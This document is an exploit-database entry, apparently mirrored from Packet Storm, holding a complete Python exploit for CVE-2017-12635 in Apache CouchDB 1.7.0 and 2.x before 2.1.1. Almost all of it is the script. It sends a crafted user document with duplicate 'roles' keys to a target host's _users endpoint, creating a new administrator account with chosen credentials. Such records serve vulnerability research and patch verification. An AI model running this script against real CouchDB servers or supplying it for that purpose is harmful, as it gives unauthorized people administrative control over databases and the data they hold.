Apache CouchDB 1.7.0 / 2.x Remote Privilege Escalation

2018-04-2300:00:00

Sebastian Castro

packetstormsecurity.com

0.974 High

EPSS

Percentile

99.9%

JSON

`# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation  
# Date: 2017-08-07  
# Exploit Author: SebastiA!n Castro @r4wd3r  
# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/  
# Software Link: http://couchdb.apache.org/  
# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1  
# CVE : CVE-2017-12635  
  
#!/usr/bin/env python  
  
import argparse  
import re  
import sys  
import requests  
  
parser = argparse.ArgumentParser(  
description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +  
' (CVE-2017-12635)')  
parser.add_argument('host', help='Host to attack.', type=str)  
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')  
parser.add_argument('-u', '--user', help='Username to create as admin.',  
type=str, default='couchara')  
parser.add_argument('-P', '--password', help='Password of the created user.',  
type=str, default='couchapass')  
args = parser.parse_args()  
  
host = args.host  
port = args.port  
user = args.user  
password = args.password  
  
pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")  
if not pat_ip.match(host):  
print "[x] Wrong host. Must be a valid IP address."  
sys.exit(1)  
  
print "[+] User to create: " + user  
print "[+] Password: " + password  
print "[+] Attacking host " + host + " on port " + port  
  
url = 'http://' + host + ':' + port  
  
try:  
rtest = requests.get(url, timeout=10)  
except requests.exceptions.Timeout:  
print "[x] Server is taking too long to answer. Exiting."  
sys.exit(1)  
except requests.ConnectionError:  
print "[x] Unable to connect to the remote host."  
sys.exit(1)  
  
# Payload for creating user  
cu_url_payload = url + "/_users/org.couchdb.user:" + user  
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'  
  
try:  
rcu = requests.put(cu_url_payload, data=cu_data_payload)  
except requests.exceptions.HTTPError:  
print "[x] ERROR: Unable to create the user on remote host."  
sys.exit(1)  
  
if rcu.status_code == 201:  
print "[+] User " + user + " with password " + password + "successfully created."  
sys.exit(0)  
else:  
print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host."  
  
  
`